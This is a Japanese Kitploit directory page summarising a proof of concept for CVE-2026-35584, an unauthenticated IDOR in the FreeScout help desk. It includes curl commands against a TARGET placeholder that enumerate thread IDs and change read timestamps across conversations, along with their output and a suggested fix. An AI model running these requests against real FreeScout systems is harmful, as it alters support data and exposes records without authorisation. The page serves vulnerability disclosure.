Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/spoo1k/cve-2026-35584
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト
GitHubspoo1k/cve-2026-35584

CVE-2026-35584

FreeScoutの未認証IDOR脆弱性に対する概念実証エクスプロイト。細工したHTTPリクエストにより、スレッドの列挙と既読ステータスの操作が可能になります。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-35584

POC - CVE-2026-35584 FreeScout

説明

概要

エンドポイント GET /thread/read/{conversation_id}/{thread_id} は認証を必要とせず、指定された thread_id が指定された conversation_id に属するかどうかを検証しません。これにより、認証されていない任意の攻撃者が以下を行うことができます:

任意の ID を渡して任意のスレッドを既読としてマークする HTTP レスポンスコード (200 vs 404) を介して有効なスレッド ID を列挙する 会話をまたいで opened_at タイムスタンプを操作する (IDOR)

root@kitploit:~
影響を受けるバージョン
1.8.211 (最新)

再現手順

2 つの会話を作成する (conv_id=1 と conv_id=2) 会話 2 にスレッドを作成する (thread_id=3) 認証なしで、以下を送信する: GET /thread/read/1/3 データベースで確認する — thread_id=3 の opened_at が設定されている。誤った conversation_id でアクセスされたにもかかわらず

PoC

root@kitploit:~
curl -v "http://TARGET/thread/read/1/3"

HTTP 200 を返し、スレッド 3 の opened_at を設定する

影響

認証が不要 IDOR: thread_id が conversation_id に対して検証されない スレッド列挙: HTTP 200 = 有効なスレッド、404 = 無効 サポートエージェントが使用する既読/未読メトリクスの操作 会話の分離モデルを破壊する

推奨される修正

root@kitploit:~
if ($thread->conversation_id !== (int)$conversation_id) {
abort(403);
}

PoC 出力

スレッド列挙 (認証なし)

root@kitploit:~
curl -v "http://TARGET/thread/read/1/1" → HTTP 200 (有効なスレッド)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/2" → HTTP 200 (有効なスレッド)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/3" → HTTP 200 (IDOR - スレッドは会話 2 に属する)
root@kitploit:~
curl -v "http://TARGET/thread/read/1/4" → HTTP 404 (無効なスレッド)

悪用後のデータベース状態

実行前: | id | conversation_id | opened_at | | 3 | 2 | NULL |

GET /thread/read/1/3 実行後 (認証なし): | id | conversation_id | opened_at | | 3 | 2 | 2026-04-03 23:19:46 |

ツールをダウンロード